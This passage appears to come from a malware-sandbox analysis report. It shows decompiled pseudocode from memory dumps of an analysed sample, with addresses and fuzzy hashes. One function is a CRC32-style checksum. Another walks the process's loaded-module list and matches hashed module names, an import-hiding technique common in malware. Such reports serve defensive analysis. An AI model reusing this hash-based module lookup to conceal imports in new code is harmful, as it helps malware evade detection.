                          							_t27 = (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & ((_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4)) >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & (_t39 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t39) * 4))) * 4))) * 4))) * 4);
                          							_t70 = _t70 - 1;
                          						}
                          						_t71 = _t73;
                          						if(_t71 != 0) {
                          							do {
                          								_t28 = _t27 ^  *_t75;
                          								_t75 = _t75 + 1;
                          								_t27 = _t28 >> 0x00000008 ^  *(0x418ab0 + (0x000000ff & _t28) * 4);
                          								_t71 = _t71 - 1;
                          							} while (_t71 != 0);
                          						}
                          					}
                          					_t26 =  !_t27;
                          				}
                          				_a28 = _t26;
                          				asm("popad");
                          				return _t26;
                          			}














                          0x004029d4
                          0x004029d5
                          0x004029d9
                          0x004029e2
                          0x004029e6
                          0x004029ec
                          0x004029f1
                          0x004029f7
                          0x004029ff
                          0x00402a01
                          0x00402a0c
                          0x00402a0f
                          0x00402a10
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00402a10
                          0x00402a14
                          0x00402a17
                          0x00402a1a
                          0x00402a1e
                          0x00402a55
                          0x00402a57
                          0x00402a8b
                          0x00402a8e
                          0x00402a8e
                          0x00402a91
                          0x00402a95
                          0x00402a97
                          0x00402a97
                          0x00402a99
                          0x00402aa4
                          0x00402aa7
                          0x00402aa7
                          0x00402a97
                          0x00402a95
                          0x00402aaa
                          0x00402aaa
                          0x00402aac
                          0x00402ab0
                          0x00402ab1

                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                          • Instruction ID: 8dc71014d8856f8ef2ad0e1c9cf09a1ab0c18a5277cabcb9e4e86e23f7506178
                          • Opcode Fuzzy Hash: 5f39fa327c75608c0a161e98e355e11108031192147f1793d7a103cb0e814a40
                          • Instruction Fuzzy Hash: 4B21BE76AB0A9317DB618D38C8C83B263D0EF99700F980634CF40D37C6D678EA21DA84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 90%
                          			E0040317B(intOrPtr _a4) {
                          				signed int _v8;
                          				intOrPtr _v12;
                          				void* __ecx;
                          				intOrPtr _t17;
                          				void* _t21;
                          				intOrPtr* _t23;
                          				void* _t26;
                          				void* _t28;
                          				intOrPtr* _t31;
                          				void* _t33;
                          				signed int _t34;
                          
                          				_push(_t25);
                          				_t1 =  &_v8;
                          				 *_t1 = _v8 & 0x00000000;
                          				_t34 =  *_t1;
                          				_v8 =  *[fs:0x30];
                          				_t23 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0xc)) + 0xc));
                          				_t31 = _t23;
                          				do {
                          					_v12 =  *((intOrPtr*)(_t31 + 0x18));
                          					_t28 = E00402C77(_t34,  *((intOrPtr*)(_t31 + 0x28)));
                          					_pop(_t26);
                          					_t35 = _t28;
                          					if(_t28 == 0) {
                          						goto L3;
                          					} else {
                          						E004032EA(_t35, _t28, 0);
                          						_t21 = E00402C38(_t26, _t28, E00405D24(_t28) + _t19);
                          						_t33 = _t33 + 0x14;
                          						if(_a4 == _t21) {
                          							_t17 = _v12;
                          						} else {
                          							goto L3;
                          						}
                          					}
                          					L5:
                          					return _t17;
                          					L3:
                          					_t31 =  *_t31;
                          				} while (_t23 != _t31);
                          				_t17 = 0;
                          				goto L5;
                          			}














                          0x0040317f
                          0x00403180
                          0x00403180
                          0x00403180
                          0x0040318d
                          0x00403196
                          0x00403199
                          0x0040319b
                          0x004031a1
                          0x004031a9
                          0x004031ab
                          0x004031ac
                          0x004031ae
                          0x00000000
                          0x004031b0
                          0x004031b3
                          0x004031c2
                          0x004031c7
                          0x004031cd
                          0x004031e0
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004031cd
                          0x004031d7
                          0x004031dd
                          0x004031cf
                          0x004031cf
                          0x004031d1
                          0x004031d5
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000000.00000002.662491625.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.662489145.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.662507726.00000000004A0000.00000004.00020000.sdmp Download File
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
                          • Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
                          • Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64
                          Uniqueness

                          Uniqueness Score: -1.00%